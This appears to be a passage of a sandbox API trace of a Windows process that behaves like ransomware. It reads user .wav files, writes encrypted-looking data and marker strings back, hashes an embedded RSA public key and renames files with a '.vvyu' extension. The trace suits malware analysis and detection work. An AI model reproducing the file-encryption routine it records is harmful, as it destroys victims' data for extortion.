0x2ea30c8 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.080] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3080 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.091] GetCurrentThreadId () returned 0x66c [0199.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea62b0 [0199.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.092] GetCurrentThreadId () returned 0x66c [0199.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0199.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3158 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3170 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0199.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0199.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f300 | out: hHeap=0x620000) returned 1 [0199.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.104] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x51ca, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x51ca, lpOverlapped=0x0) returned 1 [0199.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.105] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x51cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.105] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.106] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.107] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.107] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.107] CloseHandle (hObject=0x510) returned 1 [0199.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea6a68 [0199.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.109] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rbnh H.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\rbnh h.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rbnh H.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\rbnh h.wav.vvyu")) returned 1 [0199.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.111] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0199.114] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffece30, ftCreationTime.dwHighDateTime=0x1d89a0a, ftLastAccessTime.dwLowDateTime=0x689408f0, ftLastAccessTime.dwHighDateTime=0x1d8a4a9, ftLastWriteTime.dwLowDateTime=0x689408f0, ftLastWriteTime.dwHighDateTime=0x1d8a4a9, nFileSizeHigh=0x0, nFileSizeLow=0x300b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rp0gg8vJq4U.wav", cAlternateFileName="RP0GG8~1.WAV")) returned 1 [0199.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0199.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.115] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rp0gg8vJq4U.wav") returned=".wav" [0199.115] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\rp0gg8vJq4U.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\rp0gg8vjq4u.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.137] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=12299) returned 1 [0199.137] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.140] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x2fe5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.141] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.143] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.143] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x300b, lpOverlapped=0x0) returned 1 [0199.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.144] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.144] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.145] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.145] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.145] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.146] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.146] GetLastError () returned 0x0 [0199.146] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.146] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.146] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.146] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.146] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3010) returned 0x2ea79b0 [0199.147] SetFilePointer (in: 